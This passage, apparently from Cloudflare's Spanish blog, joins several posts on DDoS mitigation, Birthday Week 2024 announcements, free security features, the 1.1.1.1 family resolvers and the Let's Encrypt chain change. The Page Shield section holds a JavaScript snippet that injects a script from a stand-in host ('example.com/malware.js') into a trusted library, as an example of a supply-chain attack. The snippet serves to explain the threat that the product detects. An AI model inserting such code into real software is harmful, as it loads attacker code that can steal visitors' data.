Conforme recibe muestras de XDP, dosd generará múltiples permutaciones de huellas digitales para detectar patrones de tráfico sospechosos. A continuación, mediante un algoritmo de transmisión de datos, dosd identificará las huellas digitales óptimas para mitigar el ataque. Una vez calificado el ataque, dosd insertará una regla de mitigación en línea como un programa eBPF para descartar quirúrgicamente el tráfico de ataque. 

dosd realiza la detección y la mitigación de los ataques a nivel de servidor, a nivel de centro de datos y a nivel global, y todo ello definido por el software. Por esta razón, nuestra red es extremadamente resistente y ofrece una mitigación casi instantánea. No hay "centros de depuración" o "dispositivos de depuración" fuera de ruta. En su lugar, cada servidor ejecuta la pila completa del conjunto de productos de Cloudflare, incluido el componente de detección y mitigación de DDoS. Todo se hace de forma autónoma. Cada servidor también realiza la transmisión (multidifusión) de las instrucciones de mitigación dentro de un centro de datos entre servidores, y globalmente entre centros de datos. Esto garantiza que, ya sea un ataque localizado o distribuido globalmente, dosd ya habrá instalado reglas de mitigación en línea para garantizar una mitigación eficaz.

Nuestros sistemas de detección y mitigación de DDoS, autónomos y definidos por software, se ejecutan en toda nuestra red. En esta publicación nos hemos centrado principalmente en nuestras capacidades de huellas digitales dinámicas, pero nuestros recursos de protección van mucho más allá. El sistema de protección TCP avanzada y el sistema de protección DNS avanzada funcionan junto con nuestra huella digital dinámica para identificar los ataques DDoS sofisticados y altamente aleatorios basados en TCP y también aprovechan el análisis estadístico para impedir los ataques DDoS complejos basados en DNS. Nuestras soluciones de protección también incorporan información sobre amenazas en tiempo real, perfiles de tráfico y clasificación de aprendizaje automático como parte de nuestra protección adaptable contra DDoS para la mitigación de las anomalías de tráfico. 

Combinados, estos sistemas, junto con toda la cartera de soluciones de seguridad de Cloudflare, se han desarrollado sobre la red de Cloudflare, una de las redes más grandes del mundo, para garantizar la protección de nuestros clientes contra los mayores ataques del mundo.

Meses antes de la Semana aniversario, invitamos a los equipos a enviar sus ideas sobre posibles anuncios. Recibimos una avalancha de propuestas, que iban desde la implementación de nuevos estándares hasta la creación de nuevos productos para desarrolladores. Nuestro mayor desafío es dar cabida a este aluvión de ideas en apenas una semana. Todavía nos queda mucho por desarrollar. Por suerte, celebramos nuestro aniversario cada año. ¡Aunque es posible que necesitemos que la Semana aniversario del año que viene tenga un día más!

Por si te lo has perdido, aquí tienes todo lo que anunciamos durante la Semana aniversario de 2024:

Cloudflare presta servicio a millones de clientes y a sus millones de dominios en casi todos los países del mundo. Sin embargo, como empresa global, el panorama de los pagos puede ser complejo, especialmente en regiones fuera de Norteamérica. Aunque las tarjetas de crédito son muy populares para las compras en línea en Estados Unidos, el panorama global es bastante diferente. El 60 % de los consumidores de Europa, Oriente Medio y África, así como de Asia-Pacífico y Latinoamérica, eligen métodos de pago alternativos. Por ejemplo, los consumidores europeos suelen optar por el débito directo SEPA, un mecanismo de transferencia bancaria, mientras que los consumidores chinos suelen utilizar Alipay, un monedero digital.

En Cloudflare, consideramos esto una oportunidad para ir allí dondequiera que se encuentren los clientes. Hoy, nos complace anunciar que estamos ampliando nuestro sistema de pago y lanzando una versión beta cerrada de un nuevo método de pago llamado Stripe Link. La experiencia de pago será más rápida y fluida, lo que permitirá a nuestros clientes de autoservicio pagar con cuentas bancarias o tarjetas guardadas con Link. Los clientes que hayan guardado sus datos de pago en cualquier empresa que utilice Link pueden pagar rápidamente sin tener que volver a especificar su información de pago.  

Estos son los primeros pasos en nuestros esfuerzos por ampliar nuestro sistema de pago para dar soporte los métodos de pago globales utilizados por clientes de todo el mundo. Iremos implementando nuevos métodos de pago gradualmente, garantizando una integración fluida y recopilando los comentarios de nuestros clientes en cada paso del proceso.

Esto es todo por lo que respecta a la Semana aniversario 2024. Sin embargo, la innovación nunca se detiene en Cloudflare. Sigue el blog de Cloudflare durante todo el año para estar al día de nuestros lanzamientos de más productos y funciones que ayudan a mejorar Internet.

Esto coloca a Cloudflare en una posición de gran responsabilidad para mejorar la seguridad de Internet para miles de millones de usuarios en todo el mundo. Hoy proporcionamos información sobre amenazas y más de 10 nuevas funciones de seguridad de forma gratuita a todos nuestros clientes. Tanto si utilizas Cloudflare para proteger tu sitio web, tu red doméstica o tu oficina, encontrarás algo útil que puedes empezar a utilizar con solo unos clics.

Estas funciones se centran en algunas de las mayores preocupaciones en materia de ciberseguridad, como los ataques de apropiación de cuentas, los ataques a la cadena de suministro, los ataques contra puntos finales de la API, la visibilidad de la red y las fugas de datos de tu red.

Puedes leer más sobre cada una de estas funciones en las secciones siguientes, pero queríamos adelantarte un breve resumen.

Si eres un entusiasta de la ciberseguridad: puedes visitar nuestro nuevo sitio web de información sobre amenazas de Cloudforce One para saber más sobre ciberamenazas, campañas de ataque y otros problemas relacionados con la seguridad en Internet.

Si eres propietario de un sitio web: a partir de hoy, todos los planes gratuitos tendrán acceso a Análisis de seguridad para sus zonas. Además, también Análisis de DNS estará disponible a través de GraphQL.

Una vez que tienes visibilidad, se trata de distinguir el tráfico legítimo del tráfico malicioso. Todos los clientes pueden acceder a los servicios siempre activos de detección de ataques de apropiación de cuentas, la validación de esquemas de las API para aplicar un modelo de seguridad positivo en sus puntos finales de la API, y el supervisor de scripts de Page Shield para proporcionar visibilidad de los activos de terceros que cargas desde tu lado y que podrían utilizarse para realizar ataques a la cadena de suministro.

Si utilizas Cloudflare para proteger a tus usuarios y tu red: vamos a agrupar varios de nuestros productos Cloudflare One en una nueva solución gratuita. Este paquete incluirá los productos Zero Trust actuales que ofrecemos de forma gratuita y nuevos productos como Magic Network Monitoring para la visibilidad de la red, Prevención de pérdida de datos para los datos confidenciales y Digital Experience Monitoring para medir la conectividad y el rendimiento de la red. Cloudflare es el único proveedor que ofrece versiones gratuitas de este tipo de productos.

Si eres un usuario nuevo: tenemos nuevas opciones de autenticación. A partir de hoy, presentamos la opción de utilizar la autenticación de Google para registrarse e iniciar sesión en Cloudflare, lo que facilitará el inicio de sesión para algunos de nuestros clientes y reducirá la dependencia de tener que recordar contraseñas, reduciendo así el riesgo de que su cuenta de Cloudflare se vea comprometida.

Y ahora con más detalle:

Nuestro equipo de operaciones e investigación de amenazas, Cloudforce One, se complace en anunciar el lanzamiento de un sitio web dedicado a la información sobre amenazas y de acceso gratuito. Utilizaremos este sitio para publicar información técnica y ejecutiva sobre las últimas amenazas y tácticas de los ciberdelincuentes, así como información sobre malware, vulnerabilidades y ataques emergentes.

También publicamos dos nuevos elementos de datos en la información sobre amenazas, y prometemos más. Visita el nuevo sitio web aquí para ver las últimas investigaciones, que incluyen un actor persistente alineado con el estado que ataca a organizaciones regionales en el sur y este de Asia, así como el aumento del fraude de transporte de doble intermediación. 

Suscríbete para recibir notificaciones por correo electrónico sobre futuras investigaciones sobre amenazas.

Análisis de seguridad te ofrece una perspectiva de la seguridad de todo tu tráfico HTTP, no solo de las solicitudes mitigadas, lo que te permite centrarte en lo más importante: el tráfico que se considera malicioso pero que potencialmente no se ha mitigado. Esto significa que, además de utilizar los Eventos de seguridad para ver las medidas de seguridad adoptadas por nuestro conjunto de productos de seguridad para las aplicaciones, puedes utilizar Análisis de seguridad para revisar todo tu tráfico en busca de anomalías o comportamientos extraños y, a continuación, utilizar la información obtenida para elaborar reglas de mitigación precisas. en función de tus patrones de tráfico específicos. A partir de hoy, ponemos esta perspectiva a disposición de los clientes en todos nuestros planes.  Los usuarios de los planes gratuito y Pro ahora tendrán acceso a un nuevo panel de control de Análisis de seguridad, donde tendrás una visión general de tu tráfico en el gráfico de análisis de tráfico, y podrás agrupar y filtrar para concentrarte fácilmente en las anomalías. También puedes ver las principales estadísticas y filtrar por diversas dimensiones, como países, navegadores de origen, sistemas operativos de origen, versiones HTTP, versión del protocolo SSL, estado de la caché y acciones de seguridad.

Todos los usuarios de Cloudflare ahora tienen acceso al nuevo y mejorado panel de control de Análisis de DNS, así como al nuevo conjunto de datos de Análisis de DNS en nuestra eficaz API GraphQL. Ahora puedes analizar fácilmente las consultas DNS enviadas a tus dominios, lo que te puede ayudar a solucionar problemas, detectar patrones y tendencias, o generar informes de uso aplicando filtros eficaces y desglosando las consultas DNS por origen. Con el lanzamiento de Foundation DNS, presentamos una nueva función Análisis de DNS basados en GraphQL. Anteriormente estos análisis solo estaban disponibles para las zonas que utilizaban servidores de nombres avanzados. Sin embargo, debido a la información detallada que proporcionan estos análisis, consideramos que esta función era algo que debíamos poner a disposición de todos los usuarios. A partir de hoy, se puede acceder a la nueva función Análisis de DNS basados en GraphQL en todas las zonas que utilicen el servicio de DNS autoritativo de Cloudflare en Análisis en la sección DNS.

El 65 % de los usuarios de Internet son vulnerables a la apropiación de cuentas debido a la reutilización de contraseñas y a la creciente frecuencia de grandes fugas de datos. Ayudar a mejorar Internet implica hacer que la protección de cuentas críticas sea fácil y accesible para todos los usuarios.

A partir de hoy, proporcionamos una sólida seguridad para las cuentas que ayuda a prevenir el relleno de credenciales y otros ataques de apropiación de cuentas, a todo el mundo de forma gratuita, ya sean usuarios individuales o grandes empresas, ofreciendo gratis funciones mejoradas como las comprobaciones de credenciales filtradas y las detecciones de apropiación de cuentas. 

Estas actualizaciones incluyen la detección automática de inicios de sesión y la prevención de intentos de descifrar una contraseña por fuerza bruta con una configuración mínima, así como el acceso a una base de datos integral de credenciales filtradas de más de 15 000 millones de contraseñas que contendrá las contraseñas filtradas del servicio Have I been Pwned (HIBP) además de nuestra propia base de datos. Los clientes pueden tomar medidas respecto a las solicitudes de credenciales filtradas mediante las funciones que ofrece el WAF de Cloudflare, como las reglas de limitación de velocidad y las reglas personalizadas, o pueden tomar medidas sobre el origen aplicando la autenticación en varias fases o solicitando un restablecimiento de contraseña basado en un encabezado enviado al origen.

La configuración es sencilla: los usuarios del plan gratuito obtienen detecciones automáticas, mientras que los usuarios de pago pueden activar las nuevas funciones con un solo clic en el panel de control de Cloudflare. Para obtener más información sobre la instalación y la configuración, consulta nuestra documentación y utilízala hoy mismo.

El tráfico de API comprende más de la mitad del tráfico dinámico en la red de Cloudflare. La popularidad de las API ha abierto un nuevo conjunto de vectores de ataque. La validación de esquemas de Cloudflare API Shield es el primer paso para reforzar la seguridad de tus API frente a estas nuevas amenazas. 

Ahora, por primera vez, cualquier cliente de Cloudflare puede utilizar la validación de esquemas para garantizar que solo las solicitudes válidas enviadas a su API lleguen a su origen.

Esta funcionalidad impide la divulgación accidental de información debido a errores, evita que los desarrolladores expongan al azar puntos finales a través de un proceso no estándar y bloquea automáticamente las API zombies, ya que tu inventario de API se mantiene actualizado como parte de tu proceso de CI/CD.

Te sugerimos que utilices la API o el proveedor Terraform de Cloudflare para añadir puntos finales a Cloudflare API Shield y actualizar el esquema después de que se haya publicado tu código como parte de tu proceso de CI/CD posterior a la compilación. De esta forma, API Shield se convierte en una herramienta de inventario de API de referencia, y la validación de esquemas se encargará de las solicitudes enviadas a tu API que no esperas.

Aunque las API tienen que ver con la integración con terceros, a veces las integraciones se realizan cargando bibliotecas directamente en tu aplicación. A continuación, ayudamos a mejorar la seguridad de la web protegiendo a los usuarios contra scripts maliciosos de terceros que roben información confidencial de las entradas en tus páginas.

Las aplicaciones web modernas mejoran las experiencias de sus usuarios y reducen el tiempo de desarrollo mediante el uso de bibliotecas JavaScript de terceros. Debido a su nivel de acceso privilegiado a todo el contenido de la página, una biblioteca JavaScript de terceros en riesgo puede exfiltrar subrepticiamente información confidencial a un atacante sin que el usuario final o el administrador del sitio sea consciente de ello.

Para contrarrestar esta amenaza, lanzamos Page Shield hace tres años. Ahora lanzamos Script Monitor de Page Shield de forma gratuita para todos nuestros usuarios.

Con Script Monitor, verás todos los activos de JavaScript cargados en la página, no solo los que incluyeron tus desarrolladores. ¡Esta visibilidad incluye scripts cargados dinámicamente por otros scripts! Una vez que un atacante ha puesto en riesgo la biblioteca, es muy fácil añadir un nuevo script malicioso sin cambiar el contexto del HTML original y, en su lugar, incluir un nuevo código en el activo JavaScript existente incluido:

// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);

Script Monitor fue esencial cuando se conoció la noticia del cambio de propiedad de la biblioteca pollyfill.io. Los usuarios de Script Monitor tenían visibilidad inmediata de los scripts cargados en sus sitios y podían saber rápida y fácilmente si estaban en riesgo.

Estamos encantados de ampliar la visibilidad de estos scripts a la mayor parte de la web posible con el lanzamiento de Script Monitor para todos los clientes. Descubre cómo puedes empezar aquí en la documentación.

Los usuarios existentes de Page Shield pueden filtrar inmediatamente los datos supervisados, sabiendo si su aplicación utiliza polyfill.io (o cualquier otra biblioteca). Además, desarrollamos una reescritura de polyfill.io en respuesta al servicio en riesgo, que se activó automáticamente para los planes gratuitos en junio de 2024.

Nos complace anunciar el proveedor de comprobación de aplicaciones Cloudflare Turnstile para Google Firebase, que ofrece una eficaz integración sin necesidad de configuración manual. Con esta nueva extensión, los desarrolladores pueden crear aplicaciones móviles o web en Firebase para proteger sus proyectos contra los bots utilizando la alternativa de Cloudflare a CAPTCHA. Al aprovechar las capacidades de detección y desafío de bot de Turnstile, puedes garantizar que solo los visitantes que sean usuarios humanos auténticos interactúen con tus servicios de backend de Firebase, lo que mejora tanto la seguridad como la experiencia del usuario. Cloudflare Turnstile, una alternativa a CAPTCHA centrada en la privacidad, distingue entre usuarios humanos y bots sin perturbar la experiencia del usuario. A diferencia de las soluciones CAPTCHA tradicionales, que los usuarios suelen abandonar, Turnstile funciona de forma invisible y ofrece varios modos para garantizar interacciones fluidas con los usuarios.

La extensión de comprobación de aplicaciones de Firebase para Turnstile se integra fácilmente, lo que permite a los desarrolladores mejorar rápidamente la seguridad de las aplicaciones con una configuración mínima. Esta extensión también es gratuita con uso ilimitado con el nivel gratuito de Turnstile. Al combinar las ventajas de los servicios de backend de Google Firebase y Cloudflare Turnstile, los desarrolladores pueden ofrecer una experiencia segura y eficaz a sus usuarios. 

Cloudflare One es una plataforma integral de perímetro de servicio de acceso seguro (SASE) diseñada para proteger y conectar usuarios, aplicaciones, dispositivos y redes a través de Internet. Combina servicios como el acceso a la red Zero Trust (ZTNA), la puerta de enlace web segura (SWG) y muchos más en una única solución. Cloudflare One puede ayudar a todos a proteger a las personas y las redes, gestionar el control de acceso, proteger contra las ciberamenazas, salvaguardar sus datos y mejorar el rendimiento del tráfico de red direccionándolo a través de la red global de Cloudflare. Sustituye las medidas de seguridad tradicionales ofreciendo un enfoque basado en la nube para proteger y agilizar el acceso a los recursos corporativos.

Ahora todo el mundo tiene acceso gratuito a cuatro nuevos productos que se han añadido a Cloudflare One en los últimos dos años:

• Agente de seguridad de acceso a la nube (CASB) para mitigar el riesgo de las aplicaciones SaaS.

• Prevención de pérdida de datos (DLP) para evitar que los datos confidenciales salgan de tu red y de tus aplicaciones SaaS.

• Digital Experience Monitoring para ver la experiencia de un usuario cuando está en cualquier red.

• Magic Network Monitoring para ver todo el tráfico que circula a través de tu red.

Esto se suma a los productos de seguridad de red existentes en la plataforma Cloudflare One:

• Access para verificar la identidad de los usuarios y permitirles solo utilizar las aplicaciones que deben utilizar.

• Gateway para proteger el tráfico de red tanto de salida a la red pública como de entrada a tu red privada.

• Cloudflare Tunnel, nuestros conectores de aplicaciones, que incluyen tanto cloudflared como WARP Connector, para conectar diferentes aplicaciones, servidores y redes privadas a la red de Cloudflare.

• Cloudflare WARP, nuestro agente de dispositivos, para enviar el tráfico de forma segura desde un portátil o dispositivo móvil a Internet.

Cualquier persona con una cuenta de Cloudflare recibirá automáticamente 50 usuarios gratuitos en todos estos productos en su organización Cloudflare One. Visita nuestra página de los planes Zero Trust y SASE para obtener más información sobre nuestros productos gratuitos y para conocer nuestros planes de pago por uso y de contrato para equipos de más de 50 miembros.

El propio panel de control de Cloudflare se ha convertido en un recurso vital que es necesario proteger, y dedicamos mucho tiempo a garantizar que las cuentas de usuario de Cloudflare no se vean comprometidas.

Para ello, hemos aumentado la seguridad añadiendo métodos de autenticación adicionales, como la autenticación en dos fases (2FA) basada en aplicaciones, las claves de acceso, el inicio de sesión único (SSO) y el inicio de sesión con Apple. Hoy añadimos la posibilidad de registrarse e iniciar sesión con una cuenta de Google. 

Cloudflare admite varios flujos de trabajo de autenticación adaptados a distintos casos de uso. Aunque el inicio de sesión único y las claves de acceso son los métodos de autenticación preferidos y más seguros, creemos que proporcionar factores de autenticación más estrictos que las contraseñas llenará un vacío y aumentará la seguridad media general para nuestros usuarios. Iniciar sesión con Google facilita la vida de nuestros usuarios y evita que tengan que recordar otra contraseña cuando ya están navegando por la web con una identidad de Google.

El inicio de sesión con Google se basa en la especificación OAuth 2.0, y permite a Google compartir de forma segura información de identificación sobre una identidad determinada, al mismo tiempo que garantiza que es Google quien proporciona esta información, evitando cualquier potencial suplantación de Google por parte de entidades maliciosas.

Esto significa que podemos delegar la autenticación a Google, evitando ataques de conocimiento cero directamente en esta identidad de Cloudflare.

Al llegar a la página de inicio de sesión de Cloudflare, verás el siguiente botón. Al hacer clic en él, podrás registrarte en Cloudflare y, una vez que te hayas registrado, podrás iniciar sesión sin escribir ninguna contraseña, utilizando la protección existente que hayas configurado en tu cuenta de Google.

Con el lanzamiento de esta función, Cloudflare utiliza ahora su propio Cloudflare Workers para proporcionar una capa de abstracción para proveedores de identidad compatibles con OIDC (como las cuentas de GitHub y Microsoft), lo que significa que nuestros usuarios pueden esperar ver más compatibilidad de conexión con proveedores de identidad (IdP) en el futuro.

En este momento, solo los nuevos clientes que se registren en Google podrán iniciar sesión con su cuenta de Google, pero implementaremos esta función para un mayor número de nuestros usuarios más adelante, con la capacidad de vincular y desvincular proveedores de inicio de sesión de redes sociales, y añadiremos métodos de inicio de sesión de redes sociales adicionales. Mientras consideramos cómo optimizar las políticas de Access e IdP que se han configurado para proteger tu entorno de Cloudflare, los usuarios Enterprise con una configuración de SSO establecida no podrán utilizar este método en este momento, y aquellos con una configuración de SSO establecida basada en Google Workspace serán reenviados a su flujo de SSO.

Si eres nuevo en Cloudflare y tienes una cuenta de Google, es más fácil que nunca empezar a utilizar Cloudflare para proteger tus sitios web, crear un nuevo servicio o probar cualquiera de los otros servicios que ofrece Cloudflare.

Uno de los objetivos de Cloudflare siempre ha sido democratizar las herramientas de ciberseguridad, para que todo el mundo pueda proporcionar contenidos y conectarse a Internet de forma segura, incluso sin los recursos de las grandes organizaciones empresariales.

Hemos decidido ofrecer un amplio conjunto de nuevas funciones de forma gratuita a todos los usuarios de Cloudflare, que abarcan una amplia variedad de casos de uso de seguridad, para administradores web, administradores de red y entusiastas de la ciberseguridad. Inicia sesión en tu cuenta de Cloudflare para empezar a beneficiarte de estos anuncios hoy mismo. Nos encanta recibir comentarios en los foros de nuestra comunidad, y nos comprometemos a mejorar tanto las funciones existentes como las nuevas funciones que estén disponibles más adelante.

Un recorrido comprometido con la privacidad y la seguridad

En 2018, Cloudflare anunció 1.1.1.1, uno de los servicios de DNS para consumidores más rápidos y que prioriza la privacidad. 1.1.1.1 fue el primer producto de consumo que lanzó Cloudflare, cuyo objetivo era llegar a un público más amplio. Este servicio se diseñó para ser rápido y privado, y no mantiene información que pueda identificar quién realiza una solicitud. 

En 2020, Cloudflare anunció 1.1.1.1 for Families, diseñado para añadir una capa de protección a nuestro solucionador público 1.1.1.1 existente. Nuestro propósito con este producto era ofrecer a los consumidores, es decir, a las familias, la posibilidad de añadir un filtro de seguridad y de contenido para adultos a fin de bloquear el acceso de usuarios incautos a sitios específicos durante su navegación por Internet.

Hoy anunciamos oficialmente que cualquier proveedor de acceso a Internet y fabricante de equipos puede utilizar nuestros solucionadores de DNS de forma gratuita. Los proveedores de acceso a Internet, redes y equipos de hardware pueden inscribirse y unirse a este programa para asociarse con Cloudflare y ofrecer una experiencia de navegación más segura, fácil de usar, líder del sector y gratuita para todos los usuarios. 

Las principales empresas ya se han asociado con Cloudflare para ofrecer soluciones mejores y personalizadas para proteger a sus clientes. Al ofrecer este servicio en un lugar familiar para el cliente, puedes ayudarnos a hacer de Internet un lugar seguro para todos.

La COVID-19 planteó nuevos desafíos a partir de 2020, a medida que aumentaba la actividad en línea de los niños y la dependencia de las redes domésticas estaba más presente que nunca. Las investigaciones muestran que alrededor del 67 % de los adolescentes tienen acceso a una tableta, y que niños de tan solo dos años acceden a contenido multimedia. Aunque a menudo es impresionante ver la facilidad con la que un niño pequeño puede navegar por un teléfono inteligente o una tableta y acceder a su programa favorito de YouTube, cada vez es más preocupante que los niños puedan encontrarse involuntariamente con contenido dañino durante esta actividad. 

Nuestro lanzamiento de 1.1.1.1 for Families en 2020 proporcionó esa tranquilidad a los usuarios de todo el mundo, y sigue ofreciendo esa protección. Hoy en día, los hogares pueden configurar este servicio utilizando nuestra guía. Pueden seleccionar el solucionador de DNS que quieren utilizar, centrándose solo en la privacidad, o incluir el bloqueo de las amenazas de seguridad y el contenido para adultos en toda su red doméstica.

Aunque este servicio está disponible y es gratuito para cualquier usuario, todavía hay muchos usuarios que navegan en línea a diario sin protección. Configurar una protección como esta puede resultar abrumador, y muchos usuarios no saben por dónde empezar o cómo configurarla en sus dispositivos o en su red doméstica. Hoy anunciamos una asociación que facilitará a los usuarios la instalación y la configuración.

Los proveedores de acceso a Internet y los proveedores de red pueden utilizar los diferentes servicios de resolución de Cloudflare para ofrecer diversas soluciones a sus clientes. Nuestros socios existentes han tomado estas soluciones y las han incorporado en sus plataformas como una extensión de los servicios que ya están proporcionando a sus clientes. Este modelo integrado permite una fácil adopción y un recorrido coherente e integral para el cliente final. Cada servicio está diseñado con un propósito específico en mente, que se describe a continuación: 

Nuestro principal solucionador de privacidad (1.1.1.1) está diseñado para ofrecer velocidad y privacidad. Además, las solicitudes de DNS a nuestro solucionador público se pueden enviar a través de un canal seguro utilizando DNS sobre HTTPS (DoH) o DNS sobre TLS (DoT), lo que reduce significativamente las probabilidades de espionaje no deseado o ataques "monster-in-the-middle".

Nuestro solucionador de seguridad (1.1.1.2) tiene todas las ventajas de 1.1.1.1, con la ventaja adicional de proteger a los usuarios de aquellos sitios que contienen malware, correo no deseado, ataques de comando y control de botnets o amenazas de phishing. 

Nuestro solucionador para familias (1.1.1.3) ofrece todas las ventajas de 1.1.1.2, con la ventaja adicional de bloquear el contenido para adultos no deseado tanto en la navegación directa a los sitios, como limitando los motores de búsqueda públicos solo a Búsqueda Segura. Esto evita que un usuario busque, sin saberlo, algo que pueda devolver un resultado no deseado. 

Si los usuarios quieren aún más flexibilidad que la que ofrecen nuestros solucionadores de DNS públicos, Cloudflare también ofrece un producto Gateway que permite el filtrado, la creación de informes, el registro, el análisis y la programación personalizados. Esta solución avanzada de Gateway incluye más de 114 categorías que van desde redes sociales, plataformas de mensajería en línea, videojuegos y resultados de "búsqueda segura" hasta "hogar y jardín". 

Los filtros adicionales y la funcionalidad de programación permiten a los usuarios ejercer controles más matizados y por hora, como limitar las redes sociales durante el horario escolar o la hora de la cena. 

Si eres un proveedor de acceso a Internet o un fabricante de equipos y quieres ofrecer opciones fácilmente personalizables para tus clientes, tienes también esta opción. Tenemos un entorno multiinquilino disponible para nuestra solución Gateway con la que nuestros clientes pueden ofrecer a sus suscriptores individuales la capacidad de configurar sus propios filtros específicos para sus usuarios y hogares. Si eres un fabricante de dispositivos o un proveedor de acceso a Internet y quieres ofrecer protecciones personalizables para tus suscriptores individuales, esta puede ser una buena opción para ti.

En pocas palabras, Cloudflare es una opción fácil y obvia para proteger a los usuarios y las familias. Por eso, todas las empresas líderes han elegido asociarse con Cloudflare para ayudar a proteger a los clientes y a sus familias. En 2020, tras el lanzamiento de 1.1.1.1 for Families, atendimos más de 200 000 millones de consultas DNS al día para 1.1.1.1. En la actualidad, atendemos 1,7 billones de consultas al día para 1.1.1.1 y nuestra presencia en la red abarca más de 330 ciudades y se interconecta con más de 12 500 redes distintas. Esta red nos sitúa en un abrir y cerrar de ojos al alcance del 95 % de la población mundial conectada a Internet (tus clientes), lo que garantiza que reciban una velocidad ultrarrápida mientras navegan. 

Más allá de nuestra velocidad, casi el 20 % de todos los sitios web de todo el mundo utilizan Cloudflare como proxy inverso. Esto nos proporciona valiosa información sobre las últimas tendencias, amenazas e investigaciones de Internet. Al asociarte con nosotros, puedes aprovechar nuestros puntos fuertes (una potente infraestructura, amplia información basa en datos y un equipo dedicado a la información sobre amenazas) mientras te centras en tus prioridades principales. No hay mejor socio que uno que ofrezca un alcance global, un rendimiento excelente y privacidad integrada.

Cloudflare comenzó con el objetivo singular de ayudar a mejorar Internet, y nuestra Semana aniversario anual es un catalizador de muchos desarrollos que han definido la mejora de Internet para todos. 

Seguimos comprometidos a ayudar a proteger y mejorar Internet para todos los usuarios, y para ello debemos adaptarnos a su situación, independientemente del punto en que se encuentren. Nuestras asociaciones son fundamentales para que esto se haga realidad, y queremos que formes parte de la solución con nosotros. 

Tanto si te interesan nuestros solucionadores de DNS públicos como nuestras opciones más avanzadas de Gateway, Cloudflare tiene opciones sencillas y escalables para todos, ya sean usuarios individuales u organizaciones. Puedes registrarte hoy mismo para unirte a este programa como socio enviando este formulario, y nos pondremos en contacto contigo para entender tus necesidades y ayudarte a participar.

La cadena de certificados de Let's Encrypt que utiliza una firma cruzada con IdenTrust expirará el 30 de septiembre de 2024. A partir de ese momento, los servidores ya no podrán servir certificados firmados por la cadena con firma cruzada. En su lugar, todos los certificados de Let's Encrypt utilizarán la CA, ISRG Root X1.

La mayoría de los dispositivos y versiones de navegador lanzadas después de 2016 no se verán afectados por el cambio, ya que ISRG Root X1 ya estará instalado en los almacenes de confianza de esos clientes. La razón es que estos navegadores y sistemas operativos modernos se crearon para ser ágiles y flexibles, con almacenes de confianza que se pueden actualizar para incluir nuevas autoridades de certificación.

El cambio en la cadena de certificados afectará a los dispositivos y sistemas heredados, como los dispositivos que ejecutan la versión 7.1.1 de Android (lanzada en 2016) o anteriores, ya que dependen exclusivamente de la cadena con firma cruzada y carecen de la CA raíz ISRG X1 en su almacén de confianza. Estos clientes recibirán mensajes de error o advertencias de TLS cuando accedan a dominios protegidos por un certificado Let's Encrypt. Echamos un vistazo a los datos y descubrimos que, de todas las solicitudes de Android, el 2,96 % proceden de dispositivos que se verán afectados por el cambio. Esa es una parte sustancial del tráfico que perderá el acceso a Internet. Nos comprometemos a mantener a esos usuarios en línea y modificaremos nuestra canalización de certificados para que podamos seguir sirviendo a los usuarios en dispositivos más antiguos sin la necesidad de que tengan que realizar modificaciones manuales.

En el pasado, dedicamos nuestros esfuerzos en iniciativas como "No Browsers Left Behind" para ayudar a garantizar un soporte ininterrumpido a los clientes mientras los algoritmos basados en SHA-1 estaban quedando obsoletos. Ahora, estamos adoptando el mismo enfoque para el próximo cambio de Let's Encrypt.

Hemos tomado la decisión de eliminar Let's Encrypt como autoridad de certificación de todos los flujos en los que Cloudflare dicta la CA, lo que afecta a los clientes de Universal SSL y a aquellos que utilizan SSL for SaaS con la opción "CA por defecto".

A partir de junio de 2024, un ciclo de vida del certificado (90 días) antes de que caduque la cadena con firma cruzada, empezaremos a migrar los certificados de Let's Encrypt que estén pendientes de renovación a una CA diferente, una que garantice la compatibilidad con los dispositivos más antiguos afectados por el cambio. Esto significa que, en el futuro, los clientes solo recibirán certificados de Let's Encrypt si solicitan explícitamente a Let's Encrypt como CA.

El cambio que está realizando Let's Encrypt es necesario. Para que podamos avanzar en la compatibilidad con nuevos estándares y protocolos, tenemos que agilizar el ecosistema de la infraestructura de clave pública (PKI). Al eliminar la cadena con firma cruzada, Let's Encrypt permitirá la compatibilidad de los dispositivos, navegadores y clientes con almacenes de confianza adaptables.

Sin embargo, hemos observado cambios como este en el pasado y, aunque impulsan la adopción de nuevos estándares, afectan de manera desproporcionada a los usuarios de regiones económicamente desfavorecidas, donde el acceso a la nueva tecnología es limitado.

Nuestra misión es ayudar a mejorar Internet, y eso significa ayudar a los usuarios de todo el mundo. Anteriormente publicamos una entrada en el blog sobre el cambio de Let's Encrypt, en la que pedíamos a los clientes que cambiaran de autoridad de certificación si esperaban verse afectados. Sin embargo, determinar el impacto del cambio es un desafío. Las tasas de error debido a la incompatibilidad del almacén de confianza se registran principalmente en el cliente, lo que reduce la visibilidad que tienen los propietarios de ese dominio. Además, aunque hoy no haya solicitudes entrantes de dispositivos incompatibles, no garantiza el acceso ininterrumpido de los usuarios en el futuro.

La canalización de certificados de Cloudflare ha evolucionado a lo largo de los años para ser resistente y flexible, lo que nos permite adaptarnos sin problemas a cambios como este sin que nuestros clientes se vean afectados.

En la actualidad, Cloudflare gestiona decenas de millones de certificados en nombre de sus clientes. Para nosotros, una canalización sólida conlleva los siguientes beneficios:

1. Los clientes siempre pueden obtener un certificado TLS para su dominio.

2. Los problemas relacionados con las CA no tienen ningún impacto en la capacidad de nuestros clientes para obtener un certificado.

3. Se utilizan las prácticas recomendadas de seguridad y los estándares modernos.

4. Optimización para la escala futura.

5. Compatibilidad con una amplia gama de clientes y dispositivos.

Cada año, implementamos nuevas optimizaciones en nuestra canalización de certificados para mantener el más alto nivel de servicio. Así es como lo hacemos...

Desde el lanzamiento de Universal SSL en 2014, Cloudflare se ha encargado de emitir y entregar un certificado TLS para cada dominio protegido por nuestra red. Puede parecer trivial, pero hay algunos pasos que se deben ejecutar correctamente para que un dominio reciba un certificado:

1. Los propietarios de dominios deben completar la validación de control de dominio para cada emisión y renovación de certificado.

2. La autoridad de certificación necesita verificar el token de validación de control de dominio (DCV) para emitir el certificado.

3. Los registros CAA, que dictan qué CA se pueden utilizar para un dominio, se  deben comprobar para garantizar que solo las partes autorizadas puedan emitir el certificado.

4. La autoridad de certificación debe estar disponible para emitir el certificado.

Cada uno de estos pasos requiere la coordinación de varias partes: propietarios de dominios, CDN y autoridades de certificación. En Cloudflare, nos gusta tener el control cuando se trata del éxito de nuestra plataforma. Por eso, nos aseguramos de que cada uno de estos pasos llegue a feliz término.

